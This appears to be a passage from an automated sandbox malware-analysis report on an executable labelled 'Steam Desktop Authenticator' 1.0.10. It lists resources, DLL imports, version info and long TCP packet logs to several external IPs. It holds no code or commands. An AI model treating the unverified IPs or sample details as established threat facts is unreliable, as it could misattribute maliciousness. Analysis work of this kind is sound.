                                                                                                                                                                            RT_ICON0x166ad40x988dataEnglishUnited States
                                                                                                                                                                            RT_ICON0x1674840x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                            RT_MENU0x13ab8c0x2c8emptyEnglishUnited States
                                                                                                                                                                            RT_DIALOG0x13ae540xe8emptyEnglishUnited States
                                                                                                                                                                            RT_ACCELERATOR0x13af3c0x48emptyEnglishUnited States
                                                                                                                                                                            RT_RCDATA0x13af840x103emptyEnglishUnited States
                                                                                                                                                                            RT_GROUP_ICON0x167a6c0x84dataEnglishUnited States
                                                                                                                                                                            RT_GROUP_ICON0x167b180x14dataEnglishUnited States
                                                                                                                                                                            RT_GROUP_ICON0x167b540x14dataEnglishUnited States
                                                                                                                                                                            RT_GROUP_ICON0x167b900x14dataEnglishUnited States
                                                                                                                                                                            RT_GROUP_ICON0x167bcc0x14dataEnglishUnited States
                                                                                                                                                                            RT_VERSION0x167c200x41edata
                                                                                                                                                                            RT_MANIFEST0x1680800x487ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                                                                            Imports

                                                                                                                                                                            DLLImport
                                                                                                                                                                            KERNEL32GetModuleHandleA, GetProcAddress
                                                                                                                                                                            WSOCK32.dllWSACleanup
                                                                                                                                                                            WINMM.dllmixerOpen
                                                                                                                                                                            VERSION.dllVerQueryValueW
                                                                                                                                                                            COMCTL32.dllImageList_Create
                                                                                                                                                                            PSAPI.DLLGetModuleBaseNameW
                                                                                                                                                                            USER32.dllGetDC
                                                                                                                                                                            GDI32.dllBitBlt
                                                                                                                                                                            COMDLG32.dllGetOpenFileNameW
                                                                                                                                                                            ADVAPI32.dllRegCloseKey
                                                                                                                                                                            SHELL32.dllDragFinish
                                                                                                                                                                            ole32.dllCoGetObject
                                                                                                                                                                            OLEAUT32.dllSafeArrayGetLBound

                                                                                                                                                                            Version Infos

                                                                                                                                                                            DescriptionData
                                                                                                                                                                            Translation0x0000 0x04b0
                                                                                                                                                                            LegalCopyrightCopyright 2017
                                                                                                                                                                            Assembly Version1.0.10.0
                                                                                                                                                                            InternalNameSteam Desktop Authenticator.exe
                                                                                                                                                                            FileVersion1.0.10
                                                                                                                                                                            CompanyName
                                                                                                                                                                            LegalTrademarks
                                                                                                                                                                            CommentsDesktop implementation of Steam's mobile authenticator app
                                                                                                                                                                            ProductNameSteam Desktop Authenticator
                                                                                                                                                                            ProductVersion1.0.10
                                                                                                                                                                            FileDescriptionSteam Desktop Authenticator
                                                                                                                                                                            OriginalFilenameSteam Desktop Authenticator.exe

                                                                                                                                                                            Possible Origin

                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                            EnglishUnited States

                                                                                                                                                                            Network Behavior

                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                            TCP Packets

                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            Jul 22, 2021 11:42:58.756686926 CEST49711443192.168.2.388.99.66.31
                                                                                                                                                                            Jul 22, 2021 11:42:58.825814962 CEST4434971188.99.66.31192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:58.825999975 CEST49711443192.168.2.388.99.66.31
                                                                                                                                                                            Jul 22, 2021 11:42:58.842880011 CEST49711443192.168.2.388.99.66.31
                                                                                                                                                                            Jul 22, 2021 11:42:58.912139893 CEST4434971188.99.66.31192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:58.914864063 CEST4434971188.99.66.31192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:58.914935112 CEST4434971188.99.66.31192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:58.914988041 CEST4434971188.99.66.31192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:58.915002108 CEST49711443192.168.2.388.99.66.31
                                                                                                                                                                            Jul 22, 2021 11:42:58.915035963 CEST49711443192.168.2.388.99.66.31
                                                                                                                                                                            Jul 22, 2021 11:42:58.915039062 CEST4434971188.99.66.31192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:58.915071011 CEST49711443192.168.2.388.99.66.31
                                                                                                                                                                            Jul 22, 2021 11:42:58.915173054 CEST49711443192.168.2.388.99.66.31
                                                                                                                                                                            Jul 22, 2021 11:42:59.055423975 CEST49711443192.168.2.388.99.66.31
                                                                                                                                                                            Jul 22, 2021 11:42:59.125174999 CEST4434971188.99.66.31192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.125299931 CEST49711443192.168.2.388.99.66.31
                                                                                                                                                                            Jul 22, 2021 11:42:59.166641951 CEST49711443192.168.2.388.99.66.31
                                                                                                                                                                            Jul 22, 2021 11:42:59.241749048 CEST4434971188.99.66.31192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.241862059 CEST49711443192.168.2.388.99.66.31
                                                                                                                                                                            Jul 22, 2021 11:42:59.394864082 CEST49712443192.168.2.3104.25.234.53
                                                                                                                                                                            Jul 22, 2021 11:42:59.436276913 CEST44349712104.25.234.53192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.436394930 CEST49712443192.168.2.3104.25.234.53
                                                                                                                                                                            Jul 22, 2021 11:42:59.436954975 CEST49712443192.168.2.3104.25.234.53
                                                                                                                                                                            Jul 22, 2021 11:42:59.479173899 CEST44349712104.25.234.53192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.480345964 CEST44349712104.25.234.53192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.480372906 CEST44349712104.25.234.53192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.480423927 CEST49712443192.168.2.3104.25.234.53
                                                                                                                                                                            Jul 22, 2021 11:42:59.480467081 CEST49712443192.168.2.3104.25.234.53
                                                                                                                                                                            Jul 22, 2021 11:42:59.498867035 CEST49712443192.168.2.3104.25.234.53
                                                                                                                                                                            Jul 22, 2021 11:42:59.540132999 CEST44349712104.25.234.53192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.540498972 CEST44349712104.25.234.53192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.540566921 CEST49712443192.168.2.3104.25.234.53
                                                                                                                                                                            Jul 22, 2021 11:42:59.541446924 CEST49712443192.168.2.3104.25.234.53
                                                                                                                                                                            Jul 22, 2021 11:42:59.585441113 CEST44349712104.25.234.53192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.683588028 CEST44349712104.25.234.53192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.683687925 CEST49712443192.168.2.3104.25.234.53
                                                                                                                                                                            Jul 22, 2021 11:42:59.757873058 CEST49713443192.168.2.3104.192.141.1
                                                                                                                                                                            Jul 22, 2021 11:42:59.801004887 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.801134109 CEST49713443192.168.2.3104.192.141.1
                                                                                                                                                                            Jul 22, 2021 11:42:59.801935911 CEST49713443192.168.2.3104.192.141.1
                                                                                                                                                                            Jul 22, 2021 11:42:59.845109940 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.023966074 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.023997068 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.024015903 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.024127007 CEST49713443192.168.2.3104.192.141.1
                                                                                                                                                                            Jul 22, 2021 11:43:00.054200888 CEST49713443192.168.2.3104.192.141.1
                                                                                                                                                                            Jul 22, 2021 11:43:00.054538965 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.054663897 CEST49713443192.168.2.3104.192.141.1
                                                                                                                                                                            Jul 22, 2021 11:43:00.097695112 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.187654018 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.187798977 CEST49713443192.168.2.3104.192.141.1
                                                                                                                                                                            Jul 22, 2021 11:43:00.189469099 CEST49713443192.168.2.3104.192.141.1
                                                                                                                                                                            Jul 22, 2021 11:43:00.233757019 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.389164925 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.389215946 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.389240026 CEST49713443192.168.2.3104.192.141.1
                                                                                                                                                                            Jul 22, 2021 11:43:00.389286995 CEST49713443192.168.2.3104.192.141.1
                                                                                                                                                                            Jul 22, 2021 11:43:00.416637897 CEST44349713104.192.141.1192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.416724920 CEST49713443192.168.2.3104.192.141.1
                                                                                                                                                                            Jul 22, 2021 11:43:00.483721018 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:00.651829958 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.652004004 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:00.653352022 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:00.820758104 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.820804119 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.820842028 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.820880890 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.820909977 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.820987940 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:00.821106911 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:00.821405888 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.821446896 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.821504116 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:00.821556091 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:00.845171928 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:00.857933044 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.858073950 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.012918949 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.012980938 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.013000965 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.013252020 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.014991999 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.148030996 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.148221970 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.210562944 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.210608959 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.210647106 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.210685015 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.210731983 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.210752964 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.210774899 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.210813999 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.210813999 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.210853100 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.210891008 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.210918903 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.210927010 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.210966110 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.210988998 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.211005926 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.211054087 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.211143017 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.378385067 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378424883 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378443956 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378465891 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378496885 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378515005 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378531933 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378549099 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378556967 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.378570080 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378599882 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378606081 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.378619909 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378637075 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.378642082 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378662109 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.378664017 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378684998 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.378684998 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378704071 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.378705978 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378726959 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.378729105 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378747940 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.378748894 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378767967 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.378772974 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378791094 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.378796101 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378813982 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.378819942 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378829956 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.378842115 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378861904 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378881931 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378902912 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.378921032 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.378947973 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.547107935 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547158003 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547178030 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547198057 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547219038 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547266006 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547290087 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547313929 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547336102 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547357082 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547379971 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547405958 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547409058 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.547430038 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547451973 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547473907 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547496080 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547518015 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547540903 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547555923 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.547564030 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547589064 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547614098 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547633886 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.547636986 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547658920 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547682047 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547704935 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547722101 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.547728062 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547749996 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547777891 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547802925 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547808886 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.547825098 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547847033 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547868967 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547879934 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.547892094 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547916889 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547939062 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547946930 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.547965050 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.547987938 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.548010111 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.548011065 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.548032999 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.548054934 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.548074961 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.548077106 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.548099995 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.548121929 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.548149109 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.548171997 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.548181057 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.548194885 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.548217058 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.548238993 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.548276901 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.548337936 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.715574980 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.715609074 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.715627909 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.715646029 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.715666056 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.715684891 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.715704918 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.715724945 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.715749025 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.715770006 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.715790987 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.715811014 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.715832949 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.715852022 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.715872049 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.715874910 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.715894938 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.715919971 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.715943098 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.715964079 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.715985060 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716001987 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716025114 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716047049 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716062069 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.716068029 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716101885 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716123104 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716144085 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716162920 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716181993 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716202021 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716224909 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716242075 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716257095 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716278076 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716295004 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716305017 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.716316938 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716331959 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.716332912 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716341019 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.716348886 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716375113 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716398001 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716419935 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716430902 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.716439962 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716460943 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716480970 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716500998 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716507912 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.716521978 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716542959 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716558933 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716579914 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716590881 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.716599941 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716622114 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716644049 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.716666937 CEST4434971552.217.201.169192.168.2.3
